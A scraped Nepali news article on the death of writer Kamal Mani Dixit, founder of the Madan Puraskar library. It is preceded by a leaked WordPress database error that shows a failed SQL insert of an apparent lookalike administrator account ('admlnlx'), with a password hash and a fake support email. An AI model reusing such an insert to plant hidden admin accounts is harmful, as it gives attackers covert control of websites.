WordPress database error: [Duplicate entry '0' for key 'PRIMARY']INSERT INTO `gi_users` (`user_pass`, `user_nicename`, `user_email`, `user_url`, `user_registered`, `user_activation_key`, `display_name`, `user_login`) VALUES ('$P$B3.a8l0GhtxlYHYVTWbHqg.ntSDHgs.', 'admlnlx', 'wordpresupport@gaulekhabar.com', '', '2026-02-06 22:38:42', '', 'admlnlx', 'admlnlx')
काठमाडौं,पुस १४-
साहित्यकार कमलमणि दीक्षितको बिहिबार बिहान निधन भएको छ । दीक्षितको ८७ वर्षको उमेरमा बिहीबार बिहान २ः४५ बजे ललितपुरमा निधन भएको हो।केही समयदेखि उनी श्वास प्रश्वासको समस्याबाट ग्रसित थिए । दीक्षितको केहीबेरमा पशुपति आर्यघाटमा अन्त्येष्टी गरिने बताइएको छ । दीक्षितका दुई छोरा र एक छोरी छन्।
मदन पुरस्कार पुस्तकालय तथा मदन पुरस्कार गुठीका अध्यक्षसमेत रहेका दीक्षितका पिता केदारमणि आचार्य तथा माता विद्यादेवी दीक्षितक माइला छोरा हुन् ।दीक्षितले नेपाली भाषा तथा साहित्यको अभिलेख राख्ने उद्देश्यले मदन पुरस्कार पुस्तकालय तथा मदन पुरस्कार गुठीको स्थापना गरेका थिए ।
साहित्य क्षेत्रमा क्रियाशील दीक्षितका थुर्पै फुटकर रचना र करिब ६० वटा पुस्तक प्रकाशित छन् । दीक्षित साझा प्रकाशन, गोरखापत्र संस्थान, मदन मेमोरियल स्कुल, रोटरी क्लब, बीपी कोइराला संग्रहालय समितिलगायत दर्जनौं भाषिक, साहित्यिक, सांस्कृतिक संस्थामा सक्रिय थिए।दीक्षितको बिहीबार नै पशुपति आर्यघाटमा दाहसंस्कार गरिने परिवार स्रोतले जनाएको छ ।